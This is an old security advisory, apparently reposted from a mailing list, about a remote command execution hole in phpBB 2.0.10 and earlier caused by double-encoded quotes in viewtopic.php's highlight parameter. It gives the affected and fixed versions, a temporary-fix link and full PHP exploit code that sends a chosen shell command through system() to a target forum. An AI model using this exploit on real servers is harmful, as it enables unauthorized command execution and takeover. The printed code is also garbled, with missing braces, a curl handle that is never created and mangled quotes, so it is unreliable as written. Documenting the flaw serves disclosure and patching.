‘phpBB Remote Command Execution (Viewtopic.php Highlight)’


phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package’. Inadequate UTF-8 character escaping cause arbitrary command execution vulnerability in phpBB.’


‘The information has been provided by jessica soules.
Exploit code by pokleyzz.’


Vulnerable Systems:
 * phpBB version 2.0.10 and prior
 * The issue may affect PNphpbb and other products based on phpBB.

Immune Systems:
 * phpBB Version 2.0.11

Because of the way urldecode and magic quotes works, it turns %2527 into %27, which is a single quote, and it leaves it unslashed. This gives you a SQL Injection, leading to arbitrary PHP exec hole.


Will result in the following error message:
Parse error: parse error, unexpected T_STRING in viewtopic.php(1109) : regexp code on line 1

Fatal error: Failed evaluating code: preg_replace(‘#b(‘)b#i’, ‘1’, ‘>POST TEXT HERE<‘) in viewtopic.php on line 1109

Vendor Status:
The issue has been fixed in phpBB version 2.0.11 and newer.

Temporary fix:
A temporary fix can be found at: http://www.phpbb.com/phpBB/viewtopic.php?t=240513

Exploit Code:
#!/usr/bin/php -q
# phpBB 2.0.10 execute command by pokleyzz <pokleyzz at scan-associates.net>
# 15th November 2004 : 4:04 a.m
# bug found by How Dark (http://www.howdark.com) (1st October 2004)
# Requirement:
# PHP 4.x with curl extension;
# ** Selamat Hari Raya **

if (!(function_exists(‘curl_init’))) {
    echo ‘cURL extension requiredn’;

if ($argv[2]){
    $url = $argv[1];
    $command = $argv[2];
else {
    echo ‘Usage: ‘.$argv[0].’ <URL> <command> [topic id] [proxy]nn’;
    echo ‘tURLt URL to phpnBB site (ex:’;
    echo ‘tcommandt command to execute on server (ex: ‘ls -la’)n’;
    echo ‘ttopic_idt topic idn’;
    echo ‘tproxyt optional proxy url (ex:’;
if ($argv[3])
    $topic = $argv[3];
    $topic = 1;

if ($argv[4])
    $proxy = $argv[4];

$cmd = str2chr($command);

$action = ‘/viewtopic.php?t=$topic&highlight=%2527%252esystem(‘.$cmd.’ )%252e%2527′;
if ($proxy){
    curl_setopt($ch, CURLOPT_PROXY,$proxy);
curl_setopt($ch, CURLOPT_URL,$url.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
echo $res;

function str2chr($str){

    for($i = 0;$i < strlen($str);$i++){
        $chr .= ‘chr(‘.ord($str{$i}).’)’;
        if ($i != strlen($str) -1)
             $chr .= ‘%252e’;
    return $chr;

Categories: UNIX